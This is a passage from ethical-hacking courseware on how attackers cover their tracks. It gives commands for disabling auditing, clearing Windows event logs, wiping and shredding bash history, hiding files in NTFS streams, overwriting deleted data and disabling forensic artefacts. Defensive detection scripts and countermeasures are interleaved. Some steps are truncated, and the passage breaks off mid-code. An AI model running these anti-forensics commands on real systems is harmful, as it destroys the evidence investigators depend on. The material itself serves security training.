C:\>auditpol /set /category:"system","account logon" /success:enable /failure:enable

Disabling system auditing:
C:\>auditpol /set /category:"system","account logon" /success:disable /failure:disable

This will make changes in the various logs that might register the attacker's actions. He/she can choose to hide the registry keys changed later on. Screenshots showing the output of Auditpol are as follows:

Figure 6.149: Screenshot showing the output of Auditpol disabling audit
Figure 6.150: Screenshot showing the output of Auditpol enabling audit
Clearing Logs
Clear_Event_Viewer_Logs.bat is a utility that can be used to wipe out the logs of the target system. This utility can be run through command prompt, PowerShell, and using a BAT file to delete security, system, and application logs. Attackers might use this utility to wipe out the logs as one method of covering their tracks on the target system.
Steps to clear logs using the Clear_Event_Viewer_Logs.bat utility are as follows.
1. Download the Clear_Event_Viewer_Logs.bat utility from https://www.tenforums.com.
2. Unblock the .bat file.
3. Right-click or press and hold on the .bat file and click/tap on Run as administrator.
4. If prompted by UAC, click/tap on Yes.
5. A command prompt will now open to clear the event logs. The command prompt will automatically close when finished.

Figure 6.151: Screenshot of clearing logs using Clear_Event_Viewer_Logs.bat

Steps to clear logs using the Meterpreter shell are as follows.
If the system exploited is with Metasploit, the attacker uses a Meterpreter shell to wipe out all the logs from a Windows system:

Figure 6.152: Screenshot of Meterpreter

Steps to clear logs using the PowerShell command are as follows.

Clear-EventLog
Source: https://docs.microsoft.com
Using the Clear-EventLog command, the attacker can clear all the PowerShell event logs from local or remote computers:
1. Launch Windows PowerShell with administrator privileges.
2. Use the following command to clear the entries from the PowerShell event log on the local or remote system:
>Clear-EventLog "Windows PowerShell"
3. Use the following command to clear specific multiple log types from local or remote systems:
Note: The parameters used in the Clear-EventLog command are as follows:
* -ComputerName: Specifies a remote computer; the default is the local computer
* -Confirm: Prompts you for confirmation before running the cmdlet
* -LogName: Specifies the event logs
* -WhatIf: Shows what will happen if the cmdlet runs

Steps to clear event logs using the wevtutil utility are as follows.
1. Launch command prompt with administrator privileges.
2. Use the following command to display a list of event logs:
>wevtutil el
3. Use the following command to clear the event logs:
>wevtutil cl <log_name>

Figure 6.153: Screenshot of clearing logs using the wevtutil utility
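Each of the log-clearing and audit-disabling actions described in the Auditpol and Clearing Logs sections leaves its own record on a Windows host, which is what a defender hunts for. The following Python script is an added example, not part of the course text: it scans an export of Windows events in JSON-lines form for Event ID 1102 (the Security log was cleared), Event ID 104 in the System log (another log was cleared), Event ID 4719 (system audit policy changed) and Event ID 4688 process-creation records for auditpol.exe or wevtutil.exe. The field names and the sample events are constructed for the example and mirror, but are not, a real exporter's schema; the "ClearedLog" field in particular is an assumption of this example.

```python
# Added example: hunting for log clearing / audit tampering in exported Windows events.
# SAMPLE_EVENTS is constructed (JSON lines); field names are this example's own.
import json
import ntpath

# Executables whose appearance in a process-creation event deserves a look.
LOG_TAMPER_TOOLS = {"auditpol.exe", "wevtutil.exe", "clear_event_viewer_logs.bat"}

def detect_log_tampering(jsonl):
    """Return alert dicts, in log order, for events that indicate track covering."""
    alerts = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        eid, channel = ev.get("EventID"), ev.get("Channel")
        common = {"time": ev["TimeCreated"], "host": ev["Computer"],
                  "user": ev.get("SubjectUserName", "?")}
        if eid == 1102 and channel == "Security":
            alerts.append(dict(common, rule="SECURITY_LOG_CLEARED", detail="Security"))
        elif eid == 104 and channel == "System":
            alerts.append(dict(common, rule="EVENT_LOG_CLEARED",
                               detail=ev.get("ClearedLog", "?")))
        elif eid == 4719:
            alerts.append(dict(common, rule="AUDIT_POLICY_CHANGED",
                               detail=ev.get("AuditPolicyChanges", "?")))
        elif eid == 4688:
            exe = ntpath.basename(ev.get("NewProcessName", "")).lower()
            if exe in LOG_TAMPER_TOOLS:
                alerts.append(dict(common, rule="TAMPER_TOOL_EXECUTED", detail=exe))
    return alerts

# Constructed sample: one benign logon, two benign/suspicious process starts,
# an audit-policy change, and two log-clear events. Not real telemetry.
SAMPLE_EVENTS = r"""
{"TimeCreated": "2020-11-05T10:01:12Z", "Computer": "WS01", "Channel": "Security", "EventID": 4624, "SubjectUserName": "alice"}
{"TimeCreated": "2020-11-05T10:02:40Z", "Computer": "WS01", "Channel": "Security", "EventID": 4688, "SubjectUserName": "alice", "NewProcessName": "C:\\Windows\\System32\\auditpol.exe"}
{"TimeCreated": "2020-11-05T10:02:41Z", "Computer": "WS01", "Channel": "Security", "EventID": 4719, "SubjectUserName": "alice", "AuditPolicyChanges": "Success removed, Failure removed"}
{"TimeCreated": "2020-11-05T10:05:03Z", "Computer": "WS01", "Channel": "Security", "EventID": 4688, "SubjectUserName": "alice", "NewProcessName": "C:\\Windows\\explorer.exe"}
{"TimeCreated": "2020-11-05T10:30:17Z", "Computer": "WS01", "Channel": "Security", "EventID": 4688, "SubjectUserName": "alice", "NewProcessName": "C:\\Windows\\System32\\wevtutil.exe"}
{"TimeCreated": "2020-11-05T10:30:18Z", "Computer": "WS01", "Channel": "Security", "EventID": 1102, "SubjectUserName": "alice"}
{"TimeCreated": "2020-11-05T10:30:19Z", "Computer": "WS01", "Channel": "System", "EventID": 104, "SubjectUserName": "alice", "ClearedLog": "Application"}
"""

if __name__ == "__main__":
    for a in detect_log_tampering(SAMPLE_EVENTS):
        print(f"{a['time']} {a['host']} {a['user']:8} {a['rule']}: {a['detail']}")
```

Two practical notes: Event ID 1102 survives the clearing because Windows writes it as the first record of the fresh Security log, and 4688 only carries the process name (and command line) if process-creation auditing is enabled, which is itself one of the settings an attacker turns off with auditpol. Forwarding events to a separate log server, as the countermeasures at the end of this module recommend, is what keeps these records available after the local log is gone.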
Manually Clearing Event Logs
For Windows
* Navigate to Start > Control Panel > System and Security > Administrative Tools > double-click Event Viewer
* Delete all the log entries logged while compromising the system

Figure 6.154: Clearing event logs for Windows
For Linux
* Navigate to the /var/log directory on the Linux system
* Open the plain text file /var/log/messages, which contains the log messages, with a text editor
* Delete all the log entries logged while compromising the system

Figure 6.155: Clearing event logs for Linux
Ways to Clear Online Tracks
Attackers can clear online tracks maintained using web history, logs, cookies, cache, downloads, visited time, etc. on the target computer so that the victims cannot notice what online activities the attackers have performed.

What can attackers do to clear their online tracks?
* Use private browsing
* Delete history in the address field
* Disable stored history
* Delete private data
* Clear cookies on exit
* Clear cache on exit
* Delete downloads
* Disable password manager
* Clear data in the password manager
* Delete saved sessions
* Delete user JavaScript
* Set up multiple users
* Remove Most Recently Used (MRU)
* Clear toolbar data from browsers
* Turn off AutoComplete

To clear the online tracks of various activities, attackers should follow different paths for different OSs. The steps to clear online tracks from the Privacy Settings or from the Windows registry (Windows 10) are as follows:

From the Privacy Settings in Windows 10
* Right-click on the Start button, choose Settings, and click on Personalization
* In Personalization, click Start from the left pane and turn off both "Show most used apps" and "Show recently opened items in Jump Lists on Start or the taskbar"

From the Registry in Windows 10
* Open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
* Delete all the values except "(Default)" and then remove the key for "RecentDocs"
Covering BASH Shell Tracks
Bourne Again Shell, or Bash, is an sh-compatible shell that stores command history in a file called the bash history. You can view the saved command history using the more ~/.bash_history command. This feature of Bash is a problem for hackers, as investigators could use the bash_history file to track the origin of an attack and the exact commands used by an intruder to compromise a system. Attackers use the following commands to clear the saved command history tracks:

* Disabling history
export HISTSIZE=0
This command disables the Bash shell from saving history. HISTSIZE determines the number of commands to be saved, which is set to 0. After executing this command, attackers lose their privilege to review the previously used commands.

* Clearing the history
history -c

* Clearing the user's complete history
cat /dev/null > ~/.bash_history && history -c && exit
This command deletes the complete command history of the current and all other shells and exits the shell.

* Shredding the history
shred ~/.bash_history
This command shreds the history file and renders its contents unreadable. It is useful when an investigator locates the file, but owing to this command, he/she becomes unable to read any content in the .bash_history file.
shred ~/.bash_history && cat /dev/null > ~/.bash_history && history -c && exit

Figure 6.156: Covering Bash shell tracks
Covering Tracks on a Network
Using Reverse HTTP Shells
An attacker starts this attack by first infecting a victim's machine with malicious code, and thereby installing a reverse HTTP shell on the victim's system. This reverse HTTP shell is programmed in such a way that it asks for commands to an external master, which controls the reverse HTTP shell on a regular basis. This type of traffic is considered normal by an organization's network perimeter security controls like DMZ, firewall, etc.

Once an attacker types something on the master system, the command is retrieved and executed on the victim's system. The victim here acts as a web client who executes the HTTP GET commands, whereas the attacker behaves like a web server and responds to the requests. Once the previous commands are executed, the results are sent in the next web request. All the other users in the network can normally access the Internet; therefore, the traffic between the attacker and the victim is seen as normal.

Using Reverse ICMP Tunnels
Internet Control Message Protocol (ICMP) tunneling is a technique in which an attacker uses ICMP echo and reply packets as carriers of TCP payload, to stealthily access or control a system. This method can be used to easily bypass firewall rules, because most organizations have security mechanisms that only check incoming ICMP packets but not outgoing ones.

An attacker first configures the local client to connect with the victim. The victim's system is triggered to encapsulate a TCP payload in an ICMP echo packet, which is forwarded to the proxy server. The proxy server de-encapsulates and extracts the TCP payload, and then sends it to the attacker.

Using DNS Tunneling
DNS tunneling creates a back channel to access a remote server and applications. Attackers can make use of this back channel to exfiltrate stolen confidential or sensitive information from the server.

Using TCP Parameters
TCP parameters can be used by the attacker to distribute the payload and to create covert channels. Some of the TCP fields where data can be hidden are as follows:
* IP Identification Field: This is an easy approach in which a payload is transferred bitwise over an established session between two systems. In this approach, one character is encapsulated per packet.
* TCP Acknowledgement Number: This approach is quite difficult as it uses a bounce server that receives packets from the victim and sends it to an attacker. Here, one hidden character is relayed by the bounce server per packet.
* TCP Initial Sequence Number: This method also does not require an established connection between the two systems. Here, one hidden character is encapsulated per SYN request and reset packet.
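The ICMP and DNS tunnels described above both leave a statistical footprint that a defender can look for without decoding anything: a tunnel over DNS produces many unique, long, high-entropy subdomains under one domain, and a tunnel over ICMP produces echo payloads that are not what any normal ping tool sends. The following Python code is an added example, not part of the course text, applying those two heuristics to constructed query and echo records. The thresholds, the naive "registered domain = last two labels" rule and the reference ping payload layouts (the 32-byte Windows alphabet pattern and the iputils timestamp-plus-counting-bytes pattern) are assumptions of this example.

```python
# Added example: covert-channel heuristics over constructed DNS query and ICMP echo records.
import math
from collections import defaultdict

def shannon_entropy(data):
    """Bits per symbol of a byte string (0.0 for empty input)."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = defaultdict(int)
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())

# --- DNS tunneling: many unique, long, high-entropy subdomains under one domain ---
def dns_tunnel_suspects(queries, min_unique=5, min_entropy=3.5, max_label=30):
    per_pair = defaultdict(set)   # (client, registered domain) -> set of subdomain strings
    for client, qname in queries:
        labels = qname.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue
        # naive registered-domain rule: last two labels (an assumption of this example)
        per_pair[(client, ".".join(labels[-2:]))].add(".".join(labels[:-2]))
    suspects = []
    for (client, domain), subs in sorted(per_pair.items()):
        if len(subs) < min_unique:
            continue
        longest = max(len(lbl) for s in subs for lbl in s.split("."))
        avg_ent = sum(shannon_entropy(s.replace(".", "").encode()) for s in subs) / len(subs)
        if avg_ent >= min_entropy or longest > max_label:
            suspects.append((client, domain, len(subs), round(avg_ent, 2)))
    return suspects

# --- ICMP tunneling: echo payloads that no ordinary ping tool produces ---
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"       # 32-byte Windows ping data
LINUX_PING_TAIL = bytes(range(0x10, 0x38))              # iputils: counting bytes after a 16-byte timestamp

def looks_like_standard_ping(payload):
    if len(payload) == 32:
        return payload == WINDOWS_PING
    if len(payload) == 56:
        return payload[16:] == LINUX_PING_TAIL
    return False

def icmp_tunnel_suspects(echoes, max_len=64):
    suspects = []
    for src, dst, payload in echoes:
        if looks_like_standard_ping(payload):
            continue
        reason = "oversized" if len(payload) > max_len else "non-standard payload"
        suspects.append((src, dst, len(payload), reason, round(shannon_entropy(payload), 2)))
    return suspects

# Constructed records (not captured traffic). Domains use reserved example/test names.
DNS_QUERIES = [("10.0.0.5", "www.example.com"), ("10.0.0.5", "mail.example.com"),
               ("10.0.0.5", "cdn.example.com")]
DNS_QUERIES += [("10.0.0.5", f"static{i}.cdn-provider.test") for i in range(1, 7)]  # many, but short and plain
DNS_QUERIES += [("10.0.0.7", lbl + ".t.tunnel.example") for lbl in (
    "4f9a2c7e1b3d8e5a0c6f2b9d7e1a4c3f", "b7e2d9c4a1f6e3b8d5c2a9f7e4b1d6c3",
    "0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d", "9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b",
    "1f2e3d4c5b6a7f8e9d0c1b2a3f4e5d6c", "c3b2a1f0e9d8c7b6a5f4e3d2c1b0a9f8")]

ICMP_ECHOES = [
    ("10.0.0.5", "192.0.2.1", WINDOWS_PING),
    ("10.0.0.6", "192.0.2.1", bytes(16) + LINUX_PING_TAIL),          # zeroed timestamp stands in for a real one
    ("10.0.0.7", "198.51.100.9", bytes(range(256)) * 2),             # 512 bytes of carried data
    ("10.0.0.7", "198.51.100.9", b"carried TCP segment #0001".ljust(56, b"\x00")),
]

if __name__ == "__main__":
    print(dns_tunnel_suspects(DNS_QUERIES))
    print(icmp_tunnel_suspects(ICMP_ECHOES))
```

The benign "static1..static6" queries show why both conditions matter: a content-delivery hostname set is numerous but short and low-entropy, so it is not flagged, while the tunnel's 32-character hex labels trip both the length and the entropy test.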
Covering Tracks on an OS
Windows
NTFS has a feature called ADS that allows attackers to hide a file behind other normal files. Steps to hide files using NTFS are as follows:
* Open the command prompt with an elevated privilege
* Type the command "type C:\SecretFile.txt > C:\LegitFile.txt:SecretFile.txt" (here, C is the drive where the file is kept; the SecretFile.txt file is hidden inside the LegitFile.txt file)
* To view the hidden file, type "more < C:\LegitFile.txt:SecretFile.txt" (for this you need to know the hidden file name)

Figure 6.157: Covering tracks on Windows OS
UNIX
Files in UNIX can be hidden just by appending a dot (.) in front of a file name. In UNIX, each directory is subdivided into two directories: current directory (.) and parent directory (..). Attackers give these hidden files a similar name like ". " (with a space after the dot). These are usually placed in /tmp, /dev, and /etc.

An attacker can also edit the log files to cover their tracks. However, sometimes, using this technique of hiding files, an attacker can leave his/her trace behind because the command he/she used to open a file will be recorded in a .bash_history file. A smart attacker knows how to overcome such a problem; he/she does so by using the export command.

Figure 6.158: Covering tracks on UNIX OS
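A directory listing in which ". " or "..." sits next to the real "." and ".." entries is easy to overlook by eye but trivial to catch programmatically. The following Python script is an added example, not part of the course text: it walks a directory tree and reports entry names that consist only of dots, that are padded with whitespace, or that contain control characters, while leaving ordinary dot-files such as .cache alone. The demo builds its own temporary directory with constructed entries (including a ". " directory), so the names it flags are assumptions of the example; it relies on POSIX file-name semantics.

```python
# Added example: find directory entries whose names mimic "." / ".." or hide
# whitespace. The demo creates a temporary tree with constructed names.
import os
import tempfile

def classify_name(name):
    """Return a reason string if the entry name is deceptive, else None."""
    if name in (".", ".."):
        return None                              # the genuine current/parent entries
    core = name.strip(" \t\r\n")
    if core == "":
        return "whitespace-only name"
    if name != core:
        return "whitespace padding in name"      # e.g. ". " (dot followed by a space)
    if set(core) == {"."}:
        return "dots-only name (mimics . or ..)" # e.g. "..."
    if any(ord(c) < 32 for c in name):
        return "control characters in name"
    return None                                  # ".cache", "report.txt" and friends

def find_deceptive_entries(root):
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            reason = classify_name(name)
            if reason:
                hits.append((os.path.relpath(os.path.join(dirpath, name), root), reason))
    return sorted(hits)

def demo():
    """Constructed tree: one dot-space directory holding a file, one dots-only
    file, plus ordinary entries that must not be reported."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, ". "))
        os.mkdir(os.path.join(root, ".cache"))
        open(os.path.join(root, ". ", "payload"), "w").close()
        open(os.path.join(root, "..."), "w").close()
        open(os.path.join(root, "report.txt"), "w").close()
        return find_deceptive_entries(root)

if __name__ == "__main__":
    for path, reason in demo():
        print(repr(path), "->", reason)
```

Pointing find_deceptive_entries at /tmp, /dev and /etc, the locations named above, is the natural use; printing the path with repr() keeps the trailing space visible in the report.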
Delete Files using Cipher.exe
Cipher.exe is an in-built Windows command-line tool that can be used to securely delete data by overwriting them to avoid recovery in the future. This command also assists in encrypting and decrypting data in NTFS partitions.

When an attacker creates and encrypts a malicious text file, at the time of the encryption process, a backup file is created. Therefore, if the encryption process is interrupted, the backup file can be used to recover the data. After the completion of the encryption process, the backup file is deleted, but this deleted file can be recovered using data recovery software and can then be used by security personnel for investigation.

To avoid data recovery and cover their tracks, attackers use the Cipher.exe tool to overwrite the deleted files, first with all zeroes (0x00), second with all 255s (0xFF), and then finally with random numbers.

The attacker can delete files using Cipher.exe by implementing the following steps:
* Launch command prompt with administrator privileges
* Use the following command to overwrite deleted files in a specific folder:
cipher /w:<drive letter>:\<folder name>
* Use the following command to overwrite all the deleted files in the given drive:
cipher /w:<drive letter>

Figure 6.159: Screenshot of Cipher.exe command
Disable Windows Functionality
Disable the Last Access Timestamp
The last access timestamp of a file contains information regarding the time and date when the specific file was opened for reading or writing. Therefore, every time a user accesses a file, the timestamp is updated. Attackers use the fsutil tool to disable or enable the last access timestamp.

fsutil is a command-line utility in the Windows OS used to set the NTFS volume behavior parameter, DisableLastAccess, which controls the enabling or disabling of the last access timestamp. For example, DisableLastAccess = 1 indicates that the last access timestamps are disabled. DisableLastAccess = 0 indicates that the last access timestamps are enabled. As shown in the screenshot, attackers use the following command to disable the last access updates:
>fsutil behavior set disablelastaccess 1
Figure 6.160: Screenshot of the fsutil command

Disable Windows Hibernation
The hibernate file (Hiberfil.sys) is a hidden system file located in the root directory where the OS is installed. This file contains information regarding the system RAM stored on a hard disk at specific times (when the user selects to hibernate his/her system). This information is crucial as security personnel can use it to investigate an attack on the system. Therefore, disabling Windows hibernation is a crucial step toward covering the tracks.

The attacker can disable Windows hibernation through the registry by implementing the following steps:
* Open the Registry Editor and navigate to Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\P

Figure 6.161: Screenshot of Registry Editor to disable hibernation

The attacker can also disable hibernation through the command prompt by implementing the following steps:
* Launch command prompt with administrator privileges
* Use the following command to disable hibernation:
powercfg.exe /hibernate off

Disable Windows Virtual Memory (Paging File)
Virtual memory, also called a paging file, is a special file in Windows that is used as a compensation when RAM (physical memory) falls short of usable space. For example, if an attacker has an encrypted file and wants to read it, he/she must first decrypt it. This decrypted file stays in the paging file, even after the attacker logs out of the system. Moreover, some third-party programs can be used to store plaintext passwords and other sensitive information temporarily. Therefore, disabling paging in Windows is a crucial step toward covering tracks.

The attacker can disable paging by implementing the following steps:
1. Open Control Panel and navigate to the following location: System and Security > System > Advanced system settings
2. A System Properties dialog box appears; in the Advanced tab, click on Settings under the Performance section
3. A Performance Options dialog box appears; go to the Advanced tab and click on Change... under the Virtual Memory section
4. A Virtual Memory dialog box appears; uncheck Automatically manage paging file size for all drives
5. Click OK
6. Repeat the above steps for all disk partitions

Figure 6.162: Screenshot of disabling paging through Control Panel

Disable System Restore Points

Figure 6.163: Screenshot of disabling restore points through Control Panel in Windows 10

Disable Windows Thumbnail Cache
thumbs.db is a Windows file that stores thumbnails and information regarding graphic files such as GIF, JPEG, PNG, and TIFF, and document types such as PPTX and DOCX. This thumbnail file contains information regarding files that were previously deleted or used on the system.

For example, if an attacker has used an image file to hide a malicious file and later deleted it, a thumbnail of this image is stored inside the thumbs.db file, which reveals that the deleted file was previously used on the system.
The attacker can disable the thumbnail cache by implementing the following steps:
* Press Windows + R keys to open the Run dialog box
* Type gpedit.msc and press Enter or click OK
* The Local Group Policy Editor window appears; navigate to User Configuration > Administrative Templates > Windows Components > File Explorer
* Double-click on the Turn off the caching of thumbnails in hidden thumbs.db files setting from the right pane
* Select Enabled to turn off the thumbnail cache
* Click OK

Figure 6.164: Screenshot of disabling the thumbnail cache in Local Group Policy Editor

Disable Windows Prefetch Feature
For example, if an attacker has installed a malicious application and then uninstalled it, a copy of that application will be stored in the Prefetch file. These Prefetch files can be used by security personnel to recover deleted files during the investigation of a security incident.

Attackers can disable the Prefetch feature by implementing the following steps:
* Press Windows + R keys to open the Run dialog box
* Type services.msc and press Enter or click OK
* Search for the Superfetch service and double-click it to open Superfetch Properties (Local Computer)
* From the drop-down options in Startup type, select the Disabled option
* Click OK

Figure 6.165: Screenshot of disabling the Superfetch service
Track-Covering Tools
Track-covering tools help the attacker to clean up all the tracks of computer and Internet activities on the target computer. Track-covering tools free cache space, delete cookies, clear Internet history and shared temporary files, delete logs, and discard junk.

CCleaner
Source: https://www.ccleaner.com
CCleaner is a system optimization, privacy, and cleaning tool. It allows attackers to remove unused files and cleans traces of Internet browsing details from the target PC. With this tool, an attacker can very easily erase his/her tracks.

Figure 6.166: Screenshot of CCleaner

Some examples of track-covering tools are listed as follows:
* DBAN (https://dban.org)
* Eraser (https://www.cybertronsoft.com)
* Privacy Wipe (https://privacyroot.com)
* BleachBit (https://www.bleachbit.org)
* ClearProg (http://www.clearprog.de)
Defending against Covering Tracks
The various countermeasures against covering tracks are listed as follows:
* Activate logging functionality on all critical systems
* Conduct a periodic audit on IT systems to ensure logging functionality is in accordance with the security policy
* Ensure new events do not overwrite old entries in the log files when the storage limit is exceeded
* Configure appropriate and minimal permissions necessary to read and write log files stored on critical systems
* Maintain a separate logging server on the DMZ, so that all the critical servers, such as the DNS server, mail server, web server, etc., forward and store their logs on that server
* Regularly update and patch OSs, applications, and firmware
* Close all unused open ports and services
* Encrypt the log files stored on the system, so that altering them is not possible without an appropriate decryption key
* Set log files to "append only" mode to prevent unauthorized deletion of log entries
* Periodically backup the log files to unalterable media
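The "append only" and "separate logging server" countermeasures above work best together: a log that is chained with a keyed hash makes the deletion or alteration of any entry visible to the server that holds the key, which is something file permissions alone cannot guarantee once an attacker is root. The following Python code is an added example, not part of the course text: each entry carries an HMAC-SHA256 over the previous entry's tag, its own sequence number and its message, and the verifier walks the chain. The key, the messages and the tamper scenarios are constructed for the demo; in deployment the key and the latest tag ("head") would be kept on the logging server, not on the monitored host.

```python
# Added example: tamper-evident (hash-chained, HMAC-keyed) log with a verifier.
# The key and log messages are constructed for the demo.
import copy
import hashlib
import hmac
import json

GENESIS = "0" * 64   # tag that the first entry chains to

def _tag(key, prev, seq, msg):
    # JSON encoding keeps the three fields unambiguous (no delimiter collisions)
    payload = json.dumps([prev, seq, msg], separators=(",", ":")).encode()
    return hmac.new(key, payload, hashlib.sha256).hexdigest()

def append(log, key, msg):
    """Append msg to log (a list of dicts) and return the new head tag."""
    prev = log[-1]["mac"] if log else GENESIS
    seq = len(log)
    mac = _tag(key, prev, seq, msg)
    log.append({"seq": seq, "msg": msg, "prev": prev, "mac": mac})
    return mac

def verify(log, key, expected_head=None):
    """Return (True, None) if the chain is intact, else (False, index of first bad entry).
    With expected_head (the last tag the log server saw) truncation is caught too."""
    prev = GENESIS
    for i, rec in enumerate(log):
        if rec["seq"] != i or rec["prev"] != prev:
            return (False, i)
        if not hmac.compare_digest(_tag(key, prev, i, rec["msg"]), rec["mac"]):
            return (False, i)
        prev = rec["mac"]
    if expected_head is not None and prev != expected_head:
        return (False, len(log))
    return (True, None)

KEY = b"constructed-demo-key"   # held by the log server in a real deployment

def demo():
    """Build a 5-entry log, then check what each tampering attempt looks like."""
    log = []
    head = None
    for m in ("boot", "login alice", "sudo alice", "login bob", "logout alice"):
        head = append(log, KEY, m)
    deleted = copy.deepcopy(log)
    del deleted[2]                              # remove one entry from the middle
    modified = copy.deepcopy(log)
    modified[1]["msg"] = "login nobody"         # rewrite an entry in place
    truncated = log[:4]                         # drop the newest entry
    return {
        "intact": verify(log, KEY, head),
        "deleted": verify(deleted, KEY, head),
        "modified": verify(modified, KEY, head),
        "truncated_no_head": verify(truncated, KEY),
        "truncated_with_head": verify(truncated, KEY, head),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:20} {result}")
```

The truncated_no_head case is the important caveat: cutting entries off the end of the chain is invisible to a verifier that only has the file, which is why the server must remember the latest tag (or the host must periodically ship it) for the append-only guarantee to hold.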
Module Summary

In this module, we discussed in detail the CEH hacking methodology along with the various phases involved in system hacking, such as gaining access, escalating privileges, maintaining access, and covering tracks. We also discussed the different techniques and tools attackers employ to gain access to a target system. This module also discussed various tools and techniques attackers use to escalate their privileges. It explained various techniques, such as the execution of malicious applications (keyloggers, spyware, rootkits, etc.), NTFS stream manipulation, steganography, and steganalysis, which attackers use to maintain remote access to a target system and steal critical information. It also elaborated on the various techniques used by attackers to erase all evidence of compromise from a target system. Furthermore, the various countermeasures that should be employed to prevent system hacking attempts, along with various software protection tools, were discussed.

In the next module, we will discuss in detail the various malware threats.
Certified Ethical Hacker

Module 07: Malware Threats

Module Objectives
The primary objectives of this module are to provide knowledge about various types of malware and to illustrate how to perform malware analysis. This module presents different types of Trojans, backdoors, viruses, and worms, explains how they work and propagate or spread on the Internet, describes their symptoms, and discusses their consequences along with various malware analysis techniques such as static and dynamic malware analysis. It also discusses different ways to protect networks or system resources from malware infection.

At the end of this module, you will be able to:

- Describe the concepts of malware and malware propagation techniques
- Describe the concepts of advanced persistent threats (APTs) and their lifecycle
- Describe the concepts of Trojans, their types, and how they infect systems
- Explain the concepts of viruses, their types, and how they infect files
- Explain the concept of computer worms
- Explain the concepts of fileless malware and how they infect files
- Perform malware analysis
- Explain different techniques to detect malware
- Adopt countermeasures against malware
Module Flow

Malware Concepts
To understand the various types of malware and their impact on network and system resources, we will begin with a discussion of the basic concepts of malware. This section describes malware and highlights the common techniques used by attackers to distribute malware on the web.
Introduction to Malware
Malware is malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator for malicious activities such as theft or fraud. Malware includes viruses, worms, Trojans, rootkits, backdoors, botnets, ransomware, spyware, adware, scareware, crapware, roughware, crypters, keyloggers, etc. These may delete files, slow down computers, steal personal information, send spam, or commit fraud. Malware can perform various malicious activities ranging from simple email advertising to complex identity theft and password stealing.

Malware programmers develop and use malware to:

- Attack browsers and track websites visited
- Slow down systems and degrade system performance
- Cause hardware failure, rendering computers inoperable
- Steal personal information, including contacts
- Erase valuable information, resulting in substantial data loss
- Attack additional computer systems directly from a compromised system
- Spam inboxes with advertising emails
Different Ways for Malware to Enter a System

Instant Messenger Applications

Infection can occur via instant messenger applications such as Facebook Messenger, WhatsApp Messenger, LinkedIn Messenger, Google Hangouts, or ICQ. Users are at high risk, as they cannot be 100% sure of who is at the other end of the connection at any particular moment. For example, if you receive a file through an instant messenger application from a known person such as Bob, you will try to open and view the file. This could be a trick whereby an attacker who has hacked Bob's messenger ID and password wants to spread Trojans across Bob's contacts list to trap more victims.

Portable Hardware Media/Removable Devices

Portable hardware media such as flash drives, CDs/DVDs, and external hard drives can also inject malware into a system. A simple way of injecting malware into the target system is through physical access. For example, if Bob can access Alice's system in her absence, then he can install a Trojan by copying the Trojan software from his flash drive onto her hard drive.

Another means of portable media malware infection is through the Autorun or Autostart function. Autorun, also referred to as Autoplay, is a Windows feature that, if enabled, runs an executable program when a user inserts a CD/DVD in the DVD-ROM tray or connects a USB device. Attackers can exploit this feature to run malware along with genuine programs. They place an Autorun.inf file with the malware in a CD/DVD or USB device and trick people into inserting or plugging it into
their systems. Because many people are not aware of the risks involved, their machines are vulnerable to Autorun malware. The following is the content of an Autorun.inf file:

[autorun]
open=setup.exe
icon=setup.exe

To mitigate such infection, turn off the Autostart functionality. Follow the instructions below to turn off Autoplay in Windows 10:

1. Click Start. Type gpedit.msc in the Start Search box, and then press ENTER.
2. If you are prompted for an administrator password or confirmation, type the password, or click Allow.
3. Under Computer Configuration, expand Administrative Templates, expand Windows Components, and then click Autoplay Policies.
4. In the Details pane, double-click Turn off Autoplay.
5. Click Enabled, and then select All drives in the Turn off Autoplay box to disable Autorun on all drives.
6. Restart the computer.
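The Autorun.inf shown above is only two directives long, but an analyst triaging a removable drive wants the same question answered for any such file: which directives would cause code to run, and is the drive icon borrowed from that very executable so the drive looks like an application? The following parser is an added example, not code from the courseware; it reads the [autorun] section with the standard library, reports the launch directives (open, shellexecute, and shell\...\command keys), and includes a small helper for checking the NoDriveTypeAutoRun registry value that the Group Policy steps above set (0xFF covers every drive type). The sample file contents and function names are constructed for the example.

```python
import configparser
from typing import Dict, List

# autorun.inf directives that make Windows launch a program when the media is
# inserted (open) or when the drive is double-clicked / AutoPlayed (shellexecute).
LAUNCH_DIRECTIVES = ("open", "shellexecute")


def parse_autorun(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [autorun] section with lower-cased keys.
    The section name is matched case-insensitively; a file with no section
    header (or otherwise unparsable) yields an empty mapping."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text)
    except configparser.Error:
        return {}
    for section in parser.sections():
        if section.lower() == "autorun":
            return {k.lower(): v.strip() for k, v in parser.items(section)}
    return {}


def assess_autorun(text: str) -> List[str]:
    """Findings a reviewer wants before trusting removable media: which
    directives would run code, and whether the drive icon is read from it."""
    entries = parse_autorun(text)
    findings: List[str] = []
    for directive in LAUNCH_DIRECTIVES:
        if directive in entries:
            findings.append(f"{directive}={entries[directive]}: program would run on insertion")
    for key, value in entries.items():
        # shell\<verb>\command=... adds a context-menu action that runs a program
        if key.startswith("shell\\") and key.endswith("\\command"):
            findings.append(f"{key}={value}: context-menu action runs a program")
    icon_file = entries.get("icon", "").split(",")[0].strip().lower()
    if icon_file and icon_file == entries.get("open", "").lower():
        findings.append("icon is read from the same file that open= launches")
    return findings


def autoplay_off_for_all_drives(no_drive_type_autorun: int) -> bool:
    """True when a NoDriveTypeAutoRun value (Policies\\Explorer in HKLM or HKCU)
    disables Autoplay for every drive type, as 'Turn off Autoplay: All drives' does."""
    return (no_drive_type_autorun & 0xFF) == 0xFF


# Constructed: the file from the text above (run setup.exe on insertion, show its icon).
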